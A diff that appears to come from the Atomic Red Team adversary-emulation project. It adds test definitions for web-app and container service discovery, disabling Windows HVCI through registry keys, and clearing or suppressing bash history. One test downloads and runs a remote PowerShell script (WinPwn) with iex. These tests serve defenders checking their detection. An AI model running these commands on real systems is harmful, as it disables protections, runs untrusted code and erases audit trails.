+  auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
+  description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      fruit -noninteractive -consoleoutput
+    name: powershell
+- name: Network Service Discovery for Containers
+  auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
+  description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
+  supported_platforms:
+  - containers
+  dependency_executor_name: sh
+  dependencies:
+  - description: Verify docker is installed.
+    prereq_command: |
+      which docker
+    get_prereq_command: |
+      if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+
+  - description: Verify docker service is running.
+    prereq_command: |
+      sudo systemctl status docker  --no-pager
+    get_prereq_command: |
+      sudo systemctl start docker
+  executor:
+    command: |-
+      docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
+      docker run --name t1046_container  -d -t t1046
+      docker exec t1046_container ./test.sh
+    cleanup_command: |-
+      docker stop t1046_container
+      docker rmi -f t1046
+    name: sh
@@ -0,0 +1,9 @@
+FROM ubuntu:latest
+WORKDIR /
+RUN apt-get update && apt-get install nmap -y
+RUN apt-get update && apt-get install -y tcpdump
+RUN apt-get update && apt-get install net-tools
+RUN apt-get update && apt-get install iproute2 -y
+COPY scan.sh /scan.sh
+RUN chmod +x /scan.sh
+ENTRYPOINT ["tail", "-f", "/dev/null"]
@@ -0,0 +1,12 @@
+#!/bin/bash
+
+# Find the IP address of the host machine
+HOST_IP=$(hostname -I | awk '{print $1}')
+echo "Running ifconfig"
+ifconfig
+echo "Running nmap scan on ${HOST_IP}:"
+nmap -sV -O ${HOST_IP}
+echo "Running tcpdump -i on ${HOST_IP}:"
+tcpdump -i ${HOST_IP} -c 30
+echo "Running ss -tlwn on ${HOST_IP}:"
+ss -tuwx
@@ -92,6 +92,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too

 - [Atomic Test #43 - Disable Memory Swap](#atomic-test-43---disable-memory-swap)

+- [Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44---disable-hypervisor-enforced-code-integrity-hvci)
+

 <br/>

@@ -1776,4 +1778,60 @@ sync



+<br/>
+<br/>
+
+## Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)
+This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
+The pre-req needs to be ran in order to setup HVCI and have it enabled. 
+We do not recommend running this in production.
+[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
+[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 70bd71e6-eba4-4e00-92f7-617911dbe020
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```powershell
+reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
+reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
+reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
+reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
+reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: HVCI must be enabled
+##### Check Prereq Commands:
+```powershell
+if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
+```
+
+
+
+
 <br/>
@@ -861,3 +861,36 @@ atomic_tests:
      sync
    name: sh
    elevation_required: true
+- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
+  auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
+  description: |
+    This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
+    The pre-req needs to be ran in order to setup HVCI and have it enabled. 
+    We do not recommend running this in production.
+    [Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
+    [Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      HVCI must be enabled
+    prereq_command: |
+      if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
+  executor:
+    command: |
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
+    name: powershell
+    elevation_required: true
@@ -16,6 +16,16 @@ Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/te

 - [Atomic Test #2 - Mac HISTCONTROL](#atomic-test-2---mac-histcontrol)

+- [Atomic Test #3 - Clear bash history](#atomic-test-3---clear-bash-history)
+
+- [Atomic Test #4 - Setting the HISTCONTROL environment variable](#atomic-test-4---setting-the-histcontrol-environment-variable)
+
+- [Atomic Test #5 - Setting the HISTFILESIZE environment variable](#atomic-test-5---setting-the-histfilesize-environment-variable)
+
+- [Atomic Test #6 - Setting the HISTFILE environment variable](#atomic-test-6---setting-the-histfile-environment-variable)
+
+- [Atomic Test #7 - Setting the HISTIGNORE environment variable](#atomic-test-7---setting-the-histignore-environment-variable)
+

 <br/>

@@ -80,4 +90,215 @@ https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcon



+<br/>
+<br/>
+
+## Atomic Test #3 - Clear bash history
+An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. 
+
+In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 878794f7-c511-4199-a950-8c28b3ed8e5b
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+cp $HISTFILE $HISTFILE.OLD
+if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
+echo "" > $HISTFILE
+if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
+ls -la $HISTFILE 
+cat $HISTFILE
+history -c 
+if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
+```
+
+#### Cleanup Commands:
+```bash
+mv -f $HISTFILE.OLD $HISTFILE
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Setting the HISTCONTROL environment variable
+An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. 
+
+In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 10ab786a-028e-4465-96f6-9e83ca6c5f24
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+TEST=$(echo $HISTCONTROL)
+if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
+history -c 
+ls -la $HISTFILE # " ls -la $HISTFILE"
+if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
+# -> ls -la is not in history cache
+if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
+history -c 
+ls -la $HISTFILE
+ls -la $HISTFILE
+ls -la $HISTFILE
+if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
+```
+
+#### Cleanup Commands:
+```bash
+export HISTCONTROL=$(echo $TEST)
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Setting the HISTFILESIZE environment variable
+An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+TEST=$(echo $HISTFILESIZE)
+echo $HISTFILESIZE
+export HISTFILESIZE=0
+if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+# -> $HISTFILESIZE is zero
+```
+
+#### Cleanup Commands:
+```bash
+export HISTCONTROL=$(echo $TEST)
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Setting the HISTFILE environment variable
+An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+TEST=$(echo $HISTFILE)
+echo $HISTFILE
+export HISTFILE="/dev/null"
+if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+# -> $HISTFILE is /dev/null
+```
+
+#### Cleanup Commands:
+```bash
+export HISTFILE=$(echo $TEST)
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Setting the HISTIGNORE environment variable
+An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. 
+
+In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** f12acddb-7502-4ce6-a146-5b62c59592f1
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+# -> $HISTIGNORE = ls*:rm*:ssh*
+history -c 
+ls -la $HISTFILE
+ls -la ~/.bash_logout
+if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
+# -> ls commands are not in history
+unset HISTIGNORE
+
+if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+# -> $HISTIGNORE = *
+history -c 
+whoami
+groups
+if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
+# -> History cache is empty
+```
+
+#### Cleanup Commands:
+```bash
+unset HISTIGNORE
+```
+
+
+
+
+
 <br/>
@@ -35,3 +35,119 @@ atomic_tests:
      3. ls
      4. whoami > recon.txt
    name: manual
+- name: Clear bash history
+  auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
+  description: |
+    An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. 
+
+    In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $HISTFILE $HISTFILE.OLD
+      if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
+      echo "" > $HISTFILE
+      if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
+      ls -la $HISTFILE 
+      cat $HISTFILE
+      history -c 
+      if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
+    cleanup_command: |
+      mv -f $HISTFILE.OLD $HISTFILE 
+- name: Setting the HISTCONTROL environment variable
+  auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
+  description: |
+    An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. 
+
+    In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      TEST=$(echo $HISTCONTROL)
+      if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
+      history -c 
+      ls -la $HISTFILE # " ls -la $HISTFILE"
+      if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
+      # -> ls -la is not in history cache
+      if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
+      history -c 
+      ls -la $HISTFILE
+      ls -la $HISTFILE
+      ls -la $HISTFILE
+      if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
+    cleanup_command: |
+      export HISTCONTROL=$(echo $TEST)
+- name: Setting the HISTFILESIZE environment variable
+  auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+  description: |
+    An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+    Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      TEST=$(echo $HISTFILESIZE)
+      echo $HISTFILESIZE
+      export HISTFILESIZE=0
+      if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+      # -> $HISTFILESIZE is zero
+    cleanup_command: |
+      export HISTCONTROL=$(echo $TEST)
+- name: Setting the HISTFILE environment variable 
+  auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+  description: |
+    An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+    Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      TEST=$(echo $HISTFILE)
+      echo $HISTFILE
+      export HISTFILE="/dev/null"
+      if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+      # -> $HISTFILE is /dev/null
+    cleanup_command: |
+      export HISTFILE=$(echo $TEST)
+- name: Setting the HISTIGNORE environment variable 
+  auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
+  description: |
+    An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. 
+
+    In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+      # -> $HISTIGNORE = ls*:rm*:ssh*
+      history -c 
+      ls -la $HISTFILE
+      ls -la ~/.bash_logout
+      if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
+      # -> ls commands are not in history
+      unset HISTIGNORE
+
+      if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+      # -> $HISTIGNORE = *
+      history -c 
+      whoami
+      groups
+      if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
+      # -> History cache is empty
+    cleanup_command: |
+      unset HISTIGNORE
@@ -1292,3 +1292,10 @@ fb4151a2-db33-4f8c-b7f8-78ea8790f961
 adae83d3-0df6-45e7-b2c3-575f91584577
 e3ad8e83-3089-49ff-817f-e52f8c948090
 2db30061-589d-409b-b125-7b473944f9b3
+878794f7-c511-4199-a950-8c28b3ed8e5b
+10ab786a-028e-4465-96f6-9e83ca6c5f24
+5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+f12acddb-7502-4ce6-a146-5b62c59592f1
+70bd71e6-eba4-4e00-92f7-617911dbe020
+06eaafdb-8982-426e-8a31-d572da633caa